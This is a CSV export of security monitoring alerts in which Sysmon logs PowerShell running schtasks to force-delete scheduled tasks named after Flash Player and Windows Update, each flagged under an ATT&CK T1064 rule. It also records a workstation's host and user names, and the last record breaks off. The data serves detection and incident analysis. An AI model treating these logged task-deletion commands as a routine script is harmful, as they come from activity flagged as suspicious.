MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.743471100Z"",""eventRecordID"":""3948"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.735\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001034323100}\r\nProcessId: 988\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.735"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001034323100}"",""processId"":""988"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.455",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.685 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010b42f3100} +ProcessId: 7188 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.687726700Z"",""eventRecordID"":""3947"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.685\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010b42f3100}\r\nProcessId: 7188\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.685"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010b42f3100}"",""processId"":""7188"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.436",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.658 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010a72d3100} +ProcessId: 7776 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.660819800Z"",""eventRecordID"":""3946"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.658\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010a72d3100}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.658"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010a72d3100}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.428",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.628 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010982b3100} +ProcessId: 4912 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.630804200Z"",""eventRecordID"":""3945"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.628\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010982b3100}\r\nProcessId: 4912\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.628"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010982b3100}"",""processId"":""4912"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.408",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.604 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-00105e293100} +ProcessId: 5956 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.607291100Z"",""eventRecordID"":""3944"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.604\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-00105e293100}\r\nProcessId: 5956\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.604"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-00105e293100}"",""processId"":""5956"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.390",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.575 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-00106f263100} +ProcessId: 8080 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.578121600Z"",""eventRecordID"":""3943"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.575\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-00106f263100}\r\nProcessId: 8080\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.575"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-00106f263100}"",""processId"":""8080"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:07.345",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.537 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001041243100} +ProcessId: 6840 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows 